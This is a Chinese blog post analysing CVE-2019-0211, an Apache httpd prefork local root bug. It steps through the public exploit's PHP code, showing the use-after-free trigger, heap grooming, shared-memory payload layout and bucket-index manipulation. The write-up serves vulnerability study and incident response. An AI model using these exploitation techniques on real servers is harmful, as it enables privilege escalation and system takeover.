<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>CVE-2019-0211——Apache HTTP组件提权漏洞利 - Jon Tsang&#39;Blog</title>


    <meta name="description" content="前段时间Apache HTTP 被发现存在本地提权漏洞（CVE-2019-0211），漏洞作者在第一时间就给出了WriteUp和漏洞EXP，当时做了这个漏洞的应急响应，事后也分析了一下该漏洞，在此将分析的笔记整理分享出来，希望对大家理解该漏洞有所帮助。本文内容主要按着EXP的执行步骤一步步讲解，同时详细解释了利用过程中几个比较难理解的点：  PHP UAF漏洞的具体利用细节 all_buckets">
<meta name="keywords" content="漏洞,提权,Binary,UAF,CVE,Heap Spray,Apache,PHP">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2019-0211——Apache HTTP组件提权漏洞利">
<meta property="og:url" content="https://jontsang.github.io/post/aab8343b.html">
<meta property="og:site_name" content="Jon Tsang&#39;Blog">
<meta property="og:description" content="前段时间Apache HTTP 被发现存在本地提权漏洞（CVE-2019-0211），漏洞作者在第一时间就给出了WriteUp和漏洞EXP，当时做了这个漏洞的应急响应，事后也分析了一下该漏洞，在此将分析的笔记整理分享出来，希望对大家理解该漏洞有所帮助。本文内容主要按着EXP的执行步骤一步步讲解，同时详细解释了利用过程中几个比较难理解的点：  PHP UAF漏洞的具体利用细节 all_buckets">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823145935.png">
<meta property="og:updated_time" content="2019-09-10T15:00:16.967Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CVE-2019-0211——Apache HTTP组件提权漏洞利">
<meta name="twitter:description" content="前段时间Apache HTTP 被发现存在本地提权漏洞（CVE-2019-0211），漏洞作者在第一时间就给出了WriteUp和漏洞EXP，当时做了这个漏洞的应急响应，事后也分析了一下该漏洞，在此将分析的笔记整理分享出来，希望对大家理解该漏洞有所帮助。本文内容主要按着EXP的执行步骤一步步讲解，同时详细解释了利用过程中几个比较难理解的点：  PHP UAF漏洞的具体利用细节 all_buckets">
<meta name="twitter:image" content="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823145935.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.4.1/css/all.min.css">
<link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
    
    <style>body>.footer,body>.navbar,body>.section{opacity:0}</style>
    

    
    
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">
    

    
    

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">


    
    
    
    

<link rel="stylesheet" href="/css/back-to-top.css">


    
    

    
    
    
    

    
    
<link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

    
    
    


<link rel="stylesheet" href="/css/style.css">
</head>
<!-- <body class="is-2-column"> -->
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.png" alt="CVE-2019-0211——Apache HTTP组件提权漏洞利" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">主页</a>
                
                <a class="navbar-item"
                href="/archives">归档</a>
                
                <a class="navbar-item"
                href="/categories">分类</a>
                
                <a class="navbar-item"
                href="/tags">标签</a>
                
                <a class="navbar-item"
                href="/about">关于</a>
                
            </div>
            
            <div class="navbar-end">
                
                    
                    
                    <a class="navbar-item" target="_blank" title="Download on GitHub" href="https://github.com/JonTsang">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                    
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main"><div class="card">
    
    <div class="card-image">
        <span  class="image is-7by1">
            <img class="thumbnail" src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823145935.png" alt="CVE-2019-0211——Apache HTTP组件提权漏洞利">
        </span>
    </div>
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2019-05-06T03:16:32.000Z">2019-05-06</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/漏洞分析/">漏洞分析</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    40 分钟 读完 (大约 6004 个字)
                </span>
                
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                CVE-2019-0211——Apache HTTP组件提权漏洞利
            
        </h1>
        <div class="content">
            <p>前段时间Apache HTTP 被发现存在本地提权漏洞（CVE-2019-0211），漏洞作者在第一时间就给出了<a href="https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html" target="_blank" rel="noopener">WriteUp</a>和漏洞<a href="https://github.com/cfreal/exploits/tree/master/CVE-2019-0211-apache" target="_blank" rel="noopener">EXP</a>，当时做了这个漏洞的应急响应，事后也分析了一下该漏洞，在此将分析的笔记整理分享出来，希望对大家理解该漏洞有所帮助。本文内容主要按着EXP的执行步骤一步步讲解，同时详细解释了利用过程中几个比较难理解的点：</p>
<ul>
<li>PHP UAF漏洞的具体利用细节</li>
<li><code>all_buckets[bucket]</code>是如何指向SHM中伪造的结构以及Heap Spray的问题</li>
<li>如何让<code>apr_proc_mutex_t</code>、<code>zend_array、prefork_child_bucket</code>和<code>zend_object</code>这些Apache和PHP的结构体在内存中相互叠加</li>
</ul>
<a id="more"></a>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>作者的WriteUp中对导致漏洞代码已经有了介绍，这里就只是简单提一下，并省略了大部分的源码以减轻阅读负担。</p>
<p>在Apache的MPM prefork模式中，以root权限运行主服务器进程，同时管理一个低特权工作进程（worker）池，用于处理HTTP请求。主进程和worker之间通过一个共享内存（SHM）进行通信。</p>
<p>1.当Apache httpd服务器优雅重启（graceful）时，httpd主进程会杀死旧worker并用新worker替换它们，这就会调用<code>prefork_run()</code>函数产生新的worker：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//server/mpm/prefork/prefork.c</span></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">prefork_run</span><span class="hljs-params">(<span class="hljs-keyword">apr_pool_t</span> *_pconf, <span class="hljs-keyword">apr_pool_t</span> *plog, server_rec *s)</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">	<span class="hljs-comment">/* ... */</span>   </span><br><span class="line">  make_child(ap_server_conf, child_slot,</span><br><span class="line">    		     ap_get_scoreboard_process(child_slot)-&gt;bucket);</span><br><span class="line">	<span class="hljs-comment">/* ... */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>2.在该函数中调用<code>make_child()</code>，并使用<code>ap_get_scoreboard_process(child_slot)-&gt;bucket</code>作为参数。<code>make_child()</code>函数会创建新的子进程，同时根据<code>bucket</code>索引读取<code>all_buckets</code>数组到<code>my_bucket</code>：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//server/mpm/prefork/prefork.c</span></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">int</span> <span class="hljs-title">make_child</span><span class="hljs-params">(server_rec *s, <span class="hljs-keyword">int</span> slot, <span class="hljs-keyword">int</span> bucket)</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">	<span class="hljs-comment">/* ... */</span></span><br><span class="line">  my_bucket = &amp;all_buckets[bucket];</span><br><span class="line">  <span class="hljs-comment">/* ... */</span>  </span><br><span class="line">  child_main(slot, bucket);</span><br><span class="line">  <span class="hljs-comment">/* ... */</span></span><br></pre></td></tr></table></figure>
<p>3.调用<code>child_main()</code>，如果Apache侦听多个端口，那么<code>SAFE_ACCEPT(&lt;code&gt;)</code>宏中的<code>&lt;code&gt;</code>将会执行，这里<code>apr_proc_mutex_child_init()</code>将会执行：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//server/mpm/prefork/prefork.c</span></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">child_main</span><span class="hljs-params">(<span class="hljs-keyword">int</span> child_num_arg, <span class="hljs-keyword">int</span> child_bucket)</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">	<span class="hljs-comment">/* ... */</span></span><br><span class="line">  status = SAFE_ACCEPT(apr_proc_mutex_child_init(&amp;my_bucket-&gt;mutex,</span><br><span class="line">                       											apr_proc_mutex_lockfile(my_bucket-&gt;mutex),</span><br><span class="line">     									 											pchild));</span><br><span class="line">  <span class="hljs-comment">/* ... */</span></span><br></pre></td></tr></table></figure>
<p>4.上述函数进一步调用<code>(*mutex)-&gt;meth-&gt;child_init(mutex, pool, fname)</code>。</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment">//apr-1.7.0</span></span><br><span class="line"><span class="hljs-comment">//locks/unix/proc_mutex.c</span></span><br><span class="line">APR_DECLARE(<span class="hljs-keyword">apr_status_t</span>) apr_proc_mutex_child_init(<span class="hljs-keyword">apr_proc_mutex_t</span> **mutex,</span><br><span class="line">                                                    <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *fname,</span><br><span class="line">                                                    <span class="hljs-keyword">apr_pool_t</span> *pool)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="hljs-keyword">return</span> (*mutex)-&gt;meth-&gt;child_init(mutex, pool, fname);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>整个简化的流程如下：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">prefork_run()</span><br><span class="line">	make_child(bucket)</span><br><span class="line">		my_bucket = &amp;all_buckets[bucket];</span><br><span class="line">		child_main(bucket)</span><br><span class="line">    SAFE_ACCEPT(apr_proc_mutex_child_init)</span><br><span class="line">    	apr_proc_mutex_child_init(my_bucket-&gt;mutex)</span><br><span class="line">      	mutex-&gt;meth-&gt;child_init(&amp;my_bucket-&gt;mutex)<span class="hljs-comment">//覆盖child_init()的指针来指向代码</span></span><br></pre></td></tr></table></figure>
<p>如果我们在共享内存中伪造一个<code>prefork_child_bucket</code>结构（即all_buckets数组的元素），并修改<code>all_buckets</code>数组的索引<code>bucket</code>，就可以在第三行处的代码控制<code>my_bucket</code>指向该结构。</p>
<p>进而在后续代码执行<code>my_bucket-&gt;mutex-&gt;meth-&gt;child_init(mutex, pool, fname)</code>，<code>meth</code>结构包含指向多个函数的指针，因此，将其中的<code>child_init</code>函数的指针覆盖为我们想要执行函数的指针，就可以达到漏洞利用的目的，并且此时进程还是处于root权限的，后面才降低自身的权限。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>作者在其WriteUp将利用过程分为四个步骤，但实际的exp要比他写得更繁琐一点，在顺序上也稍微有些不同。以下是根据exp执行步骤整理的流程，补充了一些细节：</p>
<ol>
<li>利用PHP读取worker的/proc/self/maps文件，进而定位一些漏洞利用所需模块和函数的地址</li>
<li>枚举/proc/*/cmdline和/proc/*/status文件，得到所有worker进程的PID</li>
<li>利用一个PHP的UAF漏洞，在worker进程中获取读/写SHM的权限</li>
<li>遍历Apache的内存，根据内存模式匹配找到与<code>all_buckets</code>数组地址</li>
<li>因为优雅重启后，<code>all_buckets</code>的位置会改变，因此需要计算一个”适当”的bucket索引，保证<code>all_buckets[bucket]</code>仍然指向伪造的<code>prefork_child_bucket</code>结构</li>
<li>在SHM中构造payload</li>
<li>喷射payload之后剩余的SHM区域，确保第5步中<code>all_buckets[bucket]</code>指向这片区域后，能转跳到payload</li>
<li>将<code>process_score-&gt;bucket</code>修改为第5步中计算的bucket。此外为了进一步提高成功率，还可以枚举SHM区域所有的<code>process_score</code>结构，将每个worker的<code>process_score-&gt;pid</code>与第2步得到的PID的相比较，匹配上的就是正确的<code>process_score</code>结构，将每个worker的<code>process_score-&gt;bucket</code>都进行修改。</li>
<li>等待Apache优雅重启触发漏洞（每天早上6:25会自动执行，也可手动重启验证结果）</li>
</ol>
<p>具体的细节如下图：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150643.jpg" alt="漏洞原理"></p>
<h3 id="exp概述"><a href="#exp概述" class="headerlink" title="exp概述"></a>exp概述</h3><p><code>get_all_addresses()</code>、<code>get_workers_pids()</code>函数分别取得几个关键内存地址、worker的PID放入全局变量<code>$addresses</code>和<code>$worker_pids</code>中，以便在随后的利用中使用。需要注意如果执行exp时无法解析<code>shm</code>和<code>apache</code>的地址，可能是因为你的环境中<code>shm</code>的大小与exp中查找的范围不一致，可以自己查看一下maps文件，然后修改<code>if ($msize &gt;= 0x10000 &amp;&amp; $msize &lt;= 0x16000)</code>这一行为正确的值即可。</p>
<p><code>real()</code>函数有两个作用，一是触发PHP的UAF漏洞。二是开始真正的漏洞利用过程，因为<code>Z</code>中定义了<code>jsonSerialize()</code>方法，它会在类实例被序列化的时候调用，即后面执行<code>json_encode()</code>时调用，而所有的利用代码都在<code>jsonSerialize()</code>中。</p>
<p>下面的代码只保留了EXP的基本框架，只为了让大家有一个整体上的概念：</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">real</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">	<span class="hljs-keyword">global</span> $y;</span><br><span class="line">	$y = [<span class="hljs-keyword">new</span> Z()];</span><br><span class="line">	json_encode([<span class="hljs-number">0</span> =&gt; &amp;$y]);</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Z</span> <span class="hljs-keyword">implements</span> <span class="hljs-title">JsonSerializable</span></span></span><br><span class="line"><span class="hljs-class"></span>&#123;</span><br><span class="line">  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">jsonSerialize</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function">  </span>&#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">  ... </span><br><span class="line">&#125;  </span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get_all_addresses</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">  ...  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get_workers_pids</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function"></span>&#123;</span><br><span class="line">  ...  </span><br><span class="line">&#125;  </span><br><span class="line"></span><br><span class="line">$addresses = get_all_addresses();</span><br><span class="line">$workers_pids = get_workers_pids();</span><br><span class="line">real();</span><br></pre></td></tr></table></figure>
<p>接下来具体看看<code>jsonSerialize()</code>中的代码。</p>
<h3 id="利用PHP的UAF获取读写SHM的权限"><a href="#利用PHP的UAF获取读写SHM的权限" class="headerlink" title="利用PHP的UAF获取读写SHM的权限"></a>利用PHP的UAF获取读写SHM的权限</h3><p>还是先概括的讲一讲PHP这个UAF漏洞原理：</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Z</span> <span class="hljs-keyword">implements</span> <span class="hljs-title">JsonSerializable</span></span></span><br><span class="line"><span class="hljs-class"></span>&#123;</span><br><span class="line">	<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">jsonSerialize</span><span class="hljs-params">()</span></span></span><br><span class="line"><span class="hljs-function">	</span>&#123;</span><br><span class="line">		<span class="hljs-keyword">global</span> $y, $addresses, $workers_pids;</span><br><span class="line">  	...</span><br><span class="line">    <span class="hljs-keyword">$this</span>-&gt;abc = ptr2str(<span class="hljs-number">0</span>, <span class="hljs-number">79</span>);			<span class="hljs-comment">//ptr2str在这里等同于创建一个字符串</span></span><br><span class="line">  	...</span><br><span class="line">		<span class="hljs-keyword">unset</span>($y[<span class="hljs-number">0</span>]);</span><br><span class="line">  	...</span><br><span class="line">  	$x = <span class="hljs-keyword">new</span> DateInterval(<span class="hljs-string">'PT1S'</span>);</span><br><span class="line">  	...</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ol>
<li><p>我们在<code>Z</code>中定义了一个字符串<code>$this-&gt;abc</code>（PHP内部使用zend_string表示），就好比C中<code>malloc</code>一块内存</p>
</li>
<li><p>接着<code>unset($y[0])</code>（<code>Z</code>的实例），就像”<code>free</code>“掉刚才分配的内存</p>
</li>
<li><p>然后再请求分配一个和刚才释放大小相同的内存块，这里使用的是<code>DateInterval</code>（PHP的对象内部实现往往由几个结构体组成，这里其实是DateInterval中的timelib_rel_time和zend_string大小相同），于是<code>DateInterval</code>就占据了原来字符串的位置，如下图所示：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150724.jpg" alt></p>
</li>
<li><p>此时<code>$this-&gt;abc</code>仍然可用并指向原来的位置，于是我们可以通过修改<code>DateInterval</code>来控制字符串<code>$this-&gt;abc</code>。</p>
</li>
</ol>
<p>PHP字符串的内部实现如下，用一个<code>zend_string</code>表示，通过成员变量<code>len</code>来判断字符串长度，从而实现二进制安全。我们修改<code>DateInterval</code>的属性间接修改<code>len</code>的大小就可以通过<code>this-&gt;abc</code>读写SHM区域了。当然，为了能够成功利用漏洞，还有许多细节需要考虑。</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">zend_string</span> &#123;</span></span><br><span class="line">    zend_refcounted   gc;</span><br><span class="line">    zend_ulong        h;</span><br><span class="line">    <span class="hljs-keyword">size_t</span>            len;			</span><br><span class="line">    <span class="hljs-keyword">char</span>              val[<span class="hljs-number">1</span>];</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<h4 id="填充空闲内存块"><a href="#填充空闲内存块" class="headerlink" title="填充空闲内存块"></a>填充空闲内存块</h4><p>在脚本运行之前可能发生了大量的分配/释放，因此同时实例化的两个变量也不一定是连续的，为解决这个问题，实例化几个<code>DateInterval</code>对象填充不连续空闲块，以确保后面分配的内存是连续的：</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$contiguous = [];</span><br><span class="line"><span class="hljs-keyword">for</span>($i=<span class="hljs-number">0</span>;$i&lt;<span class="hljs-number">10</span>;$i++)</span><br><span class="line">	$contiguous[] = <span class="hljs-keyword">new</span> DateInterval(<span class="hljs-string">'PT1S'</span>);</span><br><span class="line"></span><br><span class="line">$_protector = ptr2str(<span class="hljs-number">0</span>, <span class="hljs-number">78</span>);</span><br></pre></td></tr></table></figure>
<h4 id="创建保护内存块"><a href="#创建保护内存块" class="headerlink" title="创建保护内存块"></a>创建保护内存块</h4><p>为了保证UAF后我们控制的结构属于一块空闲内存，如果我们之后创建其他变量，那么这些变量可能会破坏我们已经控制的结构，为了避免这种情况，这里分配了很多对象<code>Z</code>的实例，后面的代码中会将其释放，由于PHP的堆LIFO的特点，这些释放掉的内存会优先于UAF的那块内存分配，从而保护被我们控制的结构。<br><figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$room = [];</span><br><span class="line"><span class="hljs-keyword">for</span>($i=<span class="hljs-number">0</span>;$i&lt;<span class="hljs-number">10</span>;$i++)</span><br><span class="line">	$room[] = <span class="hljs-keyword">new</span> Z();</span><br></pre></td></tr></table></figure></p>
<p>函数<code>ptr2str</code>的作用相当于在内存中分配一个大小为78的<code>zend_string</code>结构，为什么是78这个大小接下来会提到。<br><figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$_protector = ptr2str(<span class="hljs-number">0</span>, <span class="hljs-number">78</span>);</span><br></pre></td></tr></table></figure></p>
<h4 id="分配UAF的字符串"><a href="#分配UAF的字符串" class="headerlink" title="分配UAF的字符串"></a>分配UAF的字符串</h4><p>接着创建字符串<code>$this-&gt;abc</code>，也就是一个<code>zend_string</code>结构，通过对它进行UAF，进而读写共享内存。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">$this</span>-&gt;abc = ptr2str(<span class="hljs-number">0</span>, <span class="hljs-number">79</span>);</span><br><span class="line">$p = <span class="hljs-keyword">new</span> DateInterval(<span class="hljs-string">'PT1S'</span>);</span><br></pre></td></tr></table></figure>
<p>创建<code>$p</code>的目的是为了保护<code>$this-&gt;abc</code>，前面说过，一个PHP对象往往由许多结构组成，而<code>DateInterval</code>中的<code>timelib_rel_time</code>结构大小就刚好为78，这就是前面为何要创建大小78的<code>zend_string</code>的原因。</p>
<p>此时的内存布局如下图所示，这里和下面的所有图示都是为了方便大家理解，因为PHP各种变量、对象都是由好几个结构组成，所以实际的PHP堆内存排布肯定比此复杂。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150752.jpg" alt></p>
<h4 id="触发UAF并验证"><a href="#触发UAF并验证" class="headerlink" title="触发UAF并验证"></a>触发UAF并验证</h4><p>接着<code>unset</code>当前对象<code>$y[0]</code>和<code>$p</code>，<code>unset</code>掉<code>$p</code>意味着释放了<code>DateInterval</code>的<code>timelib_rel_time</code>结构。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">unset</span>($y[<span class="hljs-number">0</span>]);</span><br><span class="line"><span class="hljs-keyword">unset</span>($p);</span><br></pre></td></tr></table></figure>
<p>此时内存布局如下：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150812.jpg" alt></p>
<p>然后我们将分配一个与其大小相同的字符串（$protector），由于PHP堆LIFO的特点，因此字符串将取代<code>timelib_rel_time</code>结构的位置。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># Protect $p's timelib_rel_time structure</span></span><br><span class="line">$protector = <span class="hljs-string">".$_protector"</span>;</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150828.jpg" alt></p>
<p>接着就是最重要的一步：</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$x = <span class="hljs-keyword">new</span> DateInterval(<span class="hljs-string">'PT1S'</span>);</span><br></pre></td></tr></table></figure>
<p>再次创建一个<code>DateInterval</code>，它的<code>timelib_rel_time</code>结构将刚好占据上图中free的内存位置，同时<code>$this-&gt;abc</code>仍然是可以访问free这块内存的，即：&amp;timelib_rel_time == &amp;zend_string。因此我们可以通过修改<code>DateInterval</code>对象来修改<code>zend_string.len</code>，从而控制可以读/写内存的长度。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150902.jpg" alt></p>
<p>完成上述步骤后，我们还需要验证UAF是否成功，看一下<code>DateInterval</code>的定义：</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">DateInterval &#123;</span><br><span class="line"><span class="hljs-comment">/* Properties */</span></span><br><span class="line"><span class="hljs-keyword">public</span> integer $y ;</span><br><span class="line"><span class="hljs-keyword">public</span> integer $m ;</span><br><span class="line"><span class="hljs-keyword">public</span> integer $d ;</span><br><span class="line"><span class="hljs-keyword">public</span> integer $h ;</span><br><span class="line"><span class="hljs-keyword">public</span> integer $i ;</span><br><span class="line"><span class="hljs-keyword">public</span> integer $s ;</span><br><span class="line"><span class="hljs-keyword">public</span> float $f ;</span><br><span class="line"><span class="hljs-keyword">public</span> integer $invert ;</span><br><span class="line"><span class="hljs-keyword">public</span> mixed $days ;</span><br><span class="line"><span class="hljs-comment">/* Methods */</span></span><br><span class="line"><span class="hljs-keyword">public</span> __construct ( string $interval_spec )</span><br><span class="line"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> createFromDateString ( string $time ) : DateInterval</span><br><span class="line"><span class="hljs-keyword">public</span> format ( string $format ) : string</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>因为有&amp;timelib_rel_time == &amp;zend_string，所以这里的<code>$d</code>和<code>$y</code>分别对应<code>zend_string</code>里的<code>len</code>和<code>val</code>。可以将<code>$x</code>（<code>DateInterval</code>）的<code>h</code>属性设置为0x13121110，再通过<code>$this-&gt;abc</code>字符串（<code>zend_string</code>）访问来判断UAF成功与否。</p>
